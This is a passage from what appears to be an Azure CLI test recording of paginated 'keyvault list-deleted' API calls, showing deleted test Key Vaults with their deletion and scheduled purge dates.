f","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_nnmcrndgdv2lf3njtxz4niwtlitdm3lijn5d3/providers/Microsoft.KeyVault/vaults/vault4-kjhydiy22ea2f","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T19:30:23Z","scheduledPurgeDate":"2020-04-20T19:30:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-nxtn27bhfpgyl","name":"vault3-nxtn27bhfpgyl","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_mnuoddc5rrwljzflplzmyo6iqmwiyq6q2w/providers/Microsoft.KeyVault/vaults/vault3-nxtn27bhfpgyl","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T19:29:09Z","scheduledPurgeDate":"2020-04-20T19:29:09Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-pxn6vhstoan2um","name":"vault-pxn6vhstoan2um","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_3b7454atoutdx2wv4rmgy2tewfqhaqjvxhoiznz25bwii6/providers/Microsoft.KeyVault/vaults/vault-pxn6vhstoan2um","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T19:28:04Z","scheduledPurgeDate":"2020-04-20T19:28:04Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDtboIwGIXvhSz7NaTlY4qJWZx0i8yWgC2Gn3wUZUUwtCpivPcR72I5Jzk5ycn7Js9da3ivNlUjpDa%2fazu0pWyrzbWDUic5N4xj2qR7fuSNmqTDueOTvD0a8pzJvKtOqmobaYAMlu%2f2FOowK4FuF0Wqpzy39DxzzalZAtdxgXHq2ktV8E4auMq7VralmvzwW5yea2UUvOaKF88iP9JTpV%2fG5Xh8YQLo6mA0fH2RYvzYCt4smIh3UezTiEVfFMVsy9xgw2pWemuI6b4nwx6QgVmE5k7gJSYZ6lnI%2fBVh7BqJBAYe6glCVsjQFVMf4QE5Y3oYMAuLRHt7clghQqPl5t%2fjuOHfEQEVPaEIEJrcAurPyCBs7K2diC4dzEKboFH08IkptiOPwYCunXDwvwlg2uPxBw%3d%3d"}' headers: cache-control: - no-cache content-length: - '6513' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:30 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 2f250e8d-c300-4147-aaad-51ca26cdab6a - 88260096-c24d-43d4-a411-b361d1d13d77 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDtboIwGIXvhSz7NaTlY4qJWZx0i8yWgC2Gn3wUZUUwtCpivPcR72I5Jzk5ycn7Js9da3ivNlUjpDa%2Fazu0pWyrzbWDUic5N4xj2qR7fuSNmqTDueOTvD0a8pzJvKtOqmobaYAMlu%2F2FOowK4FuF0Wqpzy39DxzzalZAtdxgXHq2ktV8E4auMq7VralmvzwW5yea2UUvOaKF88iP9JTpV%2FG5Xh8YQLo6mA0fH2RYvzYCt4smIh3UezTiEVfFMVsy9xgw2pWemuI6b4nwx6QgVmE5k7gJSYZ6lnI%2FBVh7BqJBAYe6glCVsjQFVMf4QE5Y3oYMAuLRHt7clghQqPl5t%2FjuOHfEQEVPaEIEJrcAurPyCBs7K2diC4dzEKboFH08IkptiOPwYCunXDwvwlg2uPxBw%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vault3ji7xikyrryruyribq6","name":"vault3ji7xikyrryruyribq6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptionz3ywxuxguxz3cxz7ei627wlqtgtzb2ulnqetj66ppae4q554/providers/Microsoft.KeyVault/vaults/vault3ji7xikyrryruyribq6","location":"westus","tags":{},"deletionDate":"2020-03-17T08:48:46Z","scheduledPurgeDate":"2020-06-15T08:48:46Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaulthziw2","name":"vaulthziw2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_encryptionjq5mjbcixhobqi3xl7guail3hjn4qcudmbpv2hon4oxbfmgmcv6/providers/Microsoft.KeyVault/vaults/vaulthziw2","location":"westus","tags":{},"deletionDate":"2020-03-13T20:17:38Z","scheduledPurgeDate":"2020-06-11T20:17:38Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultk5h2f","name":"vaultk5h2f","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_encryptionhzohnzbsbw4gzouikh4sgjclqploiflrrslepe5744iw5c2mscek7/providers/Microsoft.KeyVault/vaults/vaultk5h2f","location":"westus","tags":{},"deletionDate":"2020-03-13T20:12:59Z","scheduledPurgeDate":"2020-06-11T20:12:59Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmsecretkvzfy7xbrkro","name":"vmsecretkvzfy7xbrkro","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsvafs5ntq5re6gonottbimy4d2govfc6fsqjgsveecdxnaef5b44c2l64/providers/Microsoft.KeyVault/vaults/vmsecretkvzfy7xbrkro","location":"westus","tags":{},"deletionDate":"2020-03-13T19:58:40Z","scheduledPurgeDate":"2020-06-11T19:58:40Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvsyavjguzwoy","name":"vmlinuxkvsyavjguzwoy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_create_linux_secretsgjufnho6hiruug6zkchdt5qxvmaruzfmyoo42pwph/providers/Microsoft.KeyVault/vaults/vmlinuxkvsyavjguzwoy","location":"westus","tags":{},"deletionDate":"2020-03-13T19:24:23Z","scheduledPurgeDate":"2020-06-11T19:24:23Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-togrnrvforu2v","name":"vault3-togrnrvforu2v","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_cxw6iopmxtdjaanyihgcogitlxfgvsqvuo/providers/Microsoft.KeyVault/vaults/vault3-togrnrvforu2v","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T13:45:33Z","scheduledPurgeDate":"2020-04-20T13:45:33Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-exo4od4ezsc57i","name":"vault-exo4od4ezsc57i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_ccxucqsnjvp4slcu7hh2zufp6rmghtzibqyxitx4jrjak7/providers/Microsoft.KeyVault/vaults/vault-exo4od4ezsc57i","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T13:44:24Z","scheduledPurgeDate":"2020-04-20T13:44:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-b4lcw2h36345b","name":"vault4-b4lcw2h36345b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_nacqmvz6lwqrae7lizm5dfhu27ha7qidnw3q2/providers/Microsoft.KeyVault/vaults/vault4-b4lcw2h36345b","location":"westcentralus","tags":{},"deletionDate":"2020-01-21T13:42:53Z","scheduledPurgeDate":"2020-04-20T13:42:53Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-hvbyx5jiniizn","name":"vault4-hvbyx5jiniizn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_b2vtygymhe5p2i52bxdnpxdc2xhrdpn7kiyc3/providers/Microsoft.KeyVault/vaults/vault4-hvbyx5jiniizn","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T17:50:56Z","scheduledPurgeDate":"2020-04-13T17:50:56Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-irbfmbnmr4x32","name":"vault3-irbfmbnmr4x32","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_opcagignom4ihmk2alvknb6h2xxtzl7e7g/providers/Microsoft.KeyVault/vaults/vault3-irbfmbnmr4x32","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T17:48:01Z","scheduledPurgeDate":"2020-04-13T17:48:01Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDdboIwGAbgeyHLjoaUH6eYmGXakshsCbXFbGf8FEQUCK1OMN77iHex5Dt5ky%2fvmzx3rRY3tS3rSmqLu7ZHO8Z32kI7KNXKhWGc4zouxFnUahIPl05M0uZsyEsi065sVdnU0gCJmb87M1M3kxzoTpbFeixSW08T15pZOXCnLjDarrmWmeikgcu0a2STq8mX6KP4clJGJk5CiewZ5Efclvp1%2fBzLlxYwXR2MZ76%2byGpcbCpRL3kV7WnkM8qpx1DEd9wNtvzEc7gxMStuAUQ2HvBAjoWJIQIB8%2baE%2fSDKvi165D0ZCpvAdIqHwzocPC%2bAqxWG%2fprC6hfDVHt7OqwRYfRz%2b%2b85ejxsbHJMRxbuYBg6hGVzDHAfMB9ijqcE%2bIjAwg75psfQQyFADq24FbKRj2Pt8fgD"}' headers: cache-control: - no-cache content-length: - '6348' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:31 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 70f38fec-f77f-43ff-928e-90ec3675898f - f664e3c1-2073-4dac-91d8-3d338afc5aab status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDdboIwGAbgeyHLjoaUH6eYmGXakshsCbXFbGf8FEQUCK1OMN77iHex5Dt5ky%2Fvmzx3rRY3tS3rSmqLu7ZHO8Z32kI7KNXKhWGc4zouxFnUahIPl05M0uZsyEsi065sVdnU0gCJmb87M1M3kxzoTpbFeixSW08T15pZOXCnLjDarrmWmeikgcu0a2STq8mX6KP4clJGJk5CiewZ5Efclvp1%2FBzLlxYwXR2MZ76%2ByGpcbCpRL3kV7WnkM8qpx1DEd9wNtvzEc7gxMStuAUQ2HvBAjoWJIQIB8%2BaE%2FSDKvi165D0ZCpvAdIqHwzocPC%2BAqxWG%2FprC6hfDVHt7OqwRYfRz%2B%2B85ejxsbHJMRxbuYBg6hGVzDHAfMB9ijqcE%2BIjAwg75psfQQyFADq24FbKRj2Pt8fgD response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmkeyvault7p55ouygna","name":"vmkeyvault7p55ouygna","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgv72bnuhgnsmfjmgprmiwiitrcz2js2enamdxh7w5thtamwjyaovawasvbklwpv5jb/providers/Microsoft.KeyVault/vaults/vmkeyvault7p55ouygna","location":"westus","tags":{},"deletionDate":"2020-03-13T19:20:07Z","scheduledPurgeDate":"2020-06-11T19:20:07Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvcisldgoiucj","name":"vmlinuxkvcisldgoiucj","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsa4j6yrxy774pigzsd6hr3m2bpfjdvbvqayawiom45njznep5id526smd/providers/Microsoft.KeyVault/vaults/vmlinuxkvcisldgoiucj","location":"westus","tags":{},"deletionDate":"2020-03-13T19:17:48Z","scheduledPurgeDate":"2020-06-11T19:17:48Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli7pgbbcnovtmj","name":"cli7pgbbcnovtmj","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_cosmosdb_key_vault_key_urils4p3fpqt4iem4pwq43tgje25fa5hurbexybanec/providers/Microsoft.KeyVault/vaults/cli7pgbbcnovtmj","location":"westus","tags":{},"deletionDate":"2020-03-13T19:13:18Z","scheduledPurgeDate":"2020-06-11T19:13:18Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-keyvault-srb5yt","name":"cli-test-keyvault-srb5yt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_ag_identityj3iwqjiav5plthjnriiyrt5wtqopmbjaxvgl2ak7wczcv4vepjkne5j/providers/Microsoft.KeyVault/vaults/cli-test-keyvault-srb5yt","location":"westus","tags":{},"deletionDate":"2020-03-13T19:09:21Z","scheduledPurgeDate":"2020-06-11T19:09:21Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-4y2dksdbukny","name":"sfrp-cli-kv-4y2dksdbukny","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgbxo4x75dyeabqaygdhbxqfltetxc2qcjhfwtdxwr3wkk7abmfwo5m7phupvdkmc3x/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-4y2dksdbukny","location":"westus","tags":{},"deletionDate":"2020-03-13T18:28:59Z","scheduledPurgeDate":"2020-06-11T18:28:59Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-x2zkt22ufw4s33","name":"vault-x2zkt22ufw4s33","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_wpg2pdltryjzumqtlwk6ngp6ukqawwgirdgdmtylrhbeik/providers/Microsoft.KeyVault/vaults/vault-x2zkt22ufw4s33","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T17:45:58Z","scheduledPurgeDate":"2020-04-13T17:45:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/bim-kv3","name":"bim-kv3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv3","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T17:14:09Z","scheduledPurgeDate":"2020-04-13T17:14:09Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-g3kxd7yyeg4el","name":"vault3-g3kxd7yyeg4el","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_csabul6k7sqlzmjfumfsgf4e6ewz72vt6a/providers/Microsoft.KeyVault/vaults/vault3-g3kxd7yyeg4el","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T09:56:32Z","scheduledPurgeDate":"2020-04-13T09:56:32Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-qrcn6rqk3ciap","name":"vault3-qrcn6rqk3ciap","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_wm4ntgwt7dbblll2teyxkj2yqaumsqh3gy/providers/Microsoft.KeyVault/vaults/vault3-qrcn6rqk3ciap","location":"westcentralus","tags":{},"deletionDate":"2020-01-14T09:02:25Z","scheduledPurgeDate":"2020-04-13T09:02:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1587","name":"vault1587","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest2/providers/Microsoft.KeyVault/vaults/vault1587","location":"westcentralus","tags":{},"deletionDate":"2020-01-13T17:22:58Z","scheduledPurgeDate":"2020-04-12T17:22:58Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDfboIwFAbwdyHLroYUZFNMzOJsXdxsCbXFcMmfwhAEQ6sixndf51ssOTcn%2bXJOvt%2fNaESvNmVTSWN2M3Zoy%2fjWmBk%2fSh3lzLIOcRMX4iAaNYqHUydGaXuw5CmRaVceVdk20gKJnb%2b5E9u0kxyYbpbFZizSsZkmnjNxcuC9esA6du25zEQnLVymXSvbXI2%2bxTWMT7WyMlELJbLHIt%2fjY2medVIfnzvA9kygx35%2bkpX%2b2FaimfMq3NHwi1FOVwyFfMs9f8NrnsO1jVnR%2bxCNyT5yMEzHZEiBz%2biUsqCn%2b8ohw%2bKCGQJEZwOO3GDAA65WkMB6SYbs04eF8fJwWCLC6GLz7zmuuqBDYHTFTPP8ccB6SlhxIVV08XmIKNf1UWRjtHYDgHufE6QpIIbkA3Nu3O%2b%2f"}' headers: cache-control: - no-cache content-length: - '6202' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:31 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - eeb22d2b-7e96-4105-9021-557e937f8316 - 4e9c5e0e-3ef2-45d2-952b-d708988cfc14 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1dDfboIwFAbwdyHLroYUZFNMzOJsXdxsCbXFcMmfwhAEQ6sixndf51ssOTcn%2BXJOvt%2FNaESvNmVTSWN2M3Zoy%2FjWmBk%2FSh3lzLIOcRMX4iAaNYqHUydGaXuw5CmRaVceVdk20gKJnb%2B5E9u0kxyYbpbFZizSsZkmnjNxcuC9esA6du25zEQnLVymXSvbXI2%2BxTWMT7WyMlELJbLHIt%2FjY2medVIfnzvA9kygx35%2BkpX%2B2FaimfMq3NHwi1FOVwyFfMs9f8NrnsO1jVnR%2BxCNyT5yMEzHZEiBz%2BiUsqCn%2B8ohw%2BKCGQJEZwOO3GDAA65WkMB6SYbs04eF8fJwWCLC6GLz7zmuuqBDYHTFTPP8ccB6SlhxIVV08XmIKNf1UWRjtHYDgHufE6QpIIbkA3Nu3O%2B%2F response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-chjqg3dvhsdv","name":"sfrp-cli-kv-chjqg3dvhsdv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgeagvjpcisggcb2cskvhnjc4fnvcndy4dqqpb753o7psuucnhdz3abak22ih3afwju/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-chjqg3dvhsdv","location":"westus","tags":{},"deletionDate":"2020-03-13T18:27:14Z","scheduledPurgeDate":"2020-06-11T18:27:14Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestdxggmc6ca43k2gc7i","name":"clitestdxggmc6ca43k2gc7i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_existing_cert7hdddgkuz4v3wdtnuoqd2pidcu7xzbsyvcfsx5ml5l/providers/Microsoft.KeyVault/vaults/clitestdxggmc6ca43k2gc7i","location":"westus","tags":{},"deletionDate":"2020-03-13T18:26:15Z","scheduledPurgeDate":"2020-06-11T18:26:15Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestscnm3cwrj7yjla22u","name":"clitestscnm3cwrj7yjla22u","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_new_certtqwel2thsmuep7anid44qbqaczy45ae73zxcjz2d2jkqrsd/providers/Microsoft.KeyVault/vaults/clitestscnm3cwrj7yjla22u","location":"westus","tags":{},"deletionDate":"2020-03-13T18:24:31Z","scheduledPurgeDate":"2020-06-11T18:24:31Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-l7wmn2","name":"cli-test-kv-se-sd-l7wmn2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletexl4skxsowtqzr6zubskkolk3udxlqr2gov7voqu/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-l7wmn2","location":"westus","tags":{},"deletionDate":"2020-03-13T18:19:02Z","scheduledPurgeDate":"2020-06-11T18:19:02Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-zsl2i53","name":"cli-test-kv-mgmt-zsl2i53","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtqmjepkswf7xh5hbhvrsezs6tfpfcs7gn3nnd5kygbdp6lwgkkanpc/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-zsl2i53","location":"westus","tags":{},"deletionDate":"2020-03-13T18:17:24Z","scheduledPurgeDate":"2020-06-11T18:17:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1588","name":"vault1588","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest2/providers/Microsoft.KeyVault/vaults/vault1588","location":"westcentralus","tags":{},"deletionDate":"2020-01-13T17:22:58Z","scheduledPurgeDate":"2020-04-12T17:22:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-2h2qeu76bmjh6","name":"vault4-2h2qeu76bmjh6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_z7f6mj3njocyjrqzd3qvqay365j7l3gbylgf2/providers/Microsoft.KeyVault/vaults/vault4-2h2qeu76bmjh6","location":"westcentralus","tags":{},"deletionDate":"2020-01-10T07:39:14Z","scheduledPurgeDate":"2020-04-09T07:39:14Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-hszypmcvlsc5y","name":"vault4-hszypmcvlsc5y","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_iinz4uye7inpzbigvafh6rj3x5nvihcnzhwk6/providers/Microsoft.KeyVault/vaults/vault4-hszypmcvlsc5y","location":"westcentralus","tags":{},"deletionDate":"2020-01-10T04:42:44Z","scheduledPurgeDate":"2020-04-09T04:42:44Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-q5byqqqrdemzf","name":"vault3-q5byqqqrdemzf","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_rsuqbtntdvudamulyjleljsigeg2ku4zxw/providers/Microsoft.KeyVault/vaults/vault3-q5byqqqrdemzf","location":"westcentralus","tags":{},"deletionDate":"2020-01-10T04:38:29Z","scheduledPurgeDate":"2020-04-09T04:38:29Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-7usem3w5orcl3e","name":"vault-7usem3w5orcl3e","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_pdei4i2miwqixw36jaoo6njrjvzilll6xa/providers/Microsoft.KeyVault/vaults/vault-7usem3w5orcl3e","location":"westcentralus","tags":{},"deletionDate":"2020-01-10T03:42:11Z","scheduledPurgeDate":"2020-04-09T03:42:11Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdioJAAIXfRZa9WtNR2zKIxZoRapsRpxmjS3%2fGUkvDmcqM3n2lt1g4Nx8czoHvqdWiU5uirqQ2e2o7tGV8q820o1IXOTOMc1zHB3EWtRrF%2fbUVo7Q5G%2fKayLQtLqpoammYCci%2fnQnQQZKbupNlsR6L1NbTxLUmVm66Y9c0Lm1zKzLRSgMXadvIJlejX%2fGI4utJGZk4CSWyN8if%2bFLot6E5jM8tE7i6OQR8fshqeGwqUc95Fe1otGaUU5%2bhiG%2b5G2z4iedwBTA7dAFENukxICztCURmANdTgrAZlutFWEXLgBNEEHIorJyw9MakzHzM9veQ8TuFWPt6e1giwqi3%2bfc6Hrjf27j3rADyO%2b65E0B%2fSqDXkfLoB2zfYbhYDgzC%2fmBR6COMIhhyPKYVsgO20l6vPw%3d%3d"}' headers: cache-control: - no-cache content-length: - '6363' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 